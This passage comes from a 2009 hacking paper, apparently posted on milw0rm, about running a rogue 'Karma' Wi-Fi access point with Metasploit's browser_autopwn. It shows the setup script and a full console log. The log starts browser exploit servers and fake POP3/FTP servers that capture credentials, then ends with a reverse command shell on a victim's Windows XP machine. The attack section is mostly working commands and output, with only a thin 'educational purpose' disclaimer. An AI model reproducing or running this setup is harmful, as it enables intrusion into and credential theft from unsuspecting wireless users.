- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries
- Start Metasploit.
6. After that we run our kmsapng.sh like this:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
...
...
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Vesion 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\Mozilla Firefox> cd ..
D:\net user
User accounts for \\CWH
-------------------------------------------------------------------------------
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CWH CWH SUPPORT_388945a0
The command completed successfully.
Enjoy for Pwnage !!. Oops, For pentest :p
#####################
[0x11] - References
#####################
[1] PaulDotCom Forum
[2] http://www.darkoperator.com/scripts
[3] http://trac.metasploit.com/wiki/Karmetasploit
[4] http://aircrack-ng.org/doku.php
[5] http://www.citec.us
[6] http://www.milw0rm.com
####################
[0x12] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
----------------------------------------------------
This paper is written for Educational purpose only. The authors are not responsible for any damage
originating from using this paper in wrong objective. If you want to use this knowledge with other person systems,
you must request for consent from system owner before
----------------------------------------------------
# milw0rm.com [2009-02-24]